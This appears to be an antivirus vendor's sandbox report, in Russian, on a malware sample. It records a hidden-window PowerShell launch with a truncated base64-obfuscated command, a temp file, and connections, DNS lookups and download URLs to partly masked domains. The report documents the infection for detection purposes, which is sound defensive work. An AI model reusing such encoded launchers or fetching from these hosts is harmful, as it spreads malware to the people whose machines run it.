Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAEEAQgBSAEoAdwBkAGsAPQAnAFMARABSAFIAVABoAGcAcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAHUAcgBJAHQAYAB5AFAAcgBvAGAAVABvAGMAYABPAEwAIgAgAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1996
- %TEMP%\913869.cvr
- 'me###ismo.org':443
- 'me##ia.com':443
- 'mi####omm-group.com':80
- 'mi####iquette.com':80
- 'te##e.nl':80
- http://mi####omm-group.com/aspnet_client/open-resource/749h0_a_bgapak3l/
- http://mi####iquette.com/img/57ry_v_f04/
- http://te##e.nl/photosentinel/r_mcjd_p0vrxje/
- 'me###ismo.org':443
- 'me##ia.com':443
- DNS ASK me###ismo.org
- DNS ASK me##ia.com
- DNS ASK mi####omm-group.com
- DNS ASK mi####iquette.com
- DNS ASK te##e.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAEEAQgBSAEoAdwBkAGsAPQAnAFMARABSAFIAVABoAGcAcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBjAHUAcgBJAHQAYAB5AFAAcgBvAGAAVABvAGMAYABPAEwAIgAgAD...' (со скрытым окном)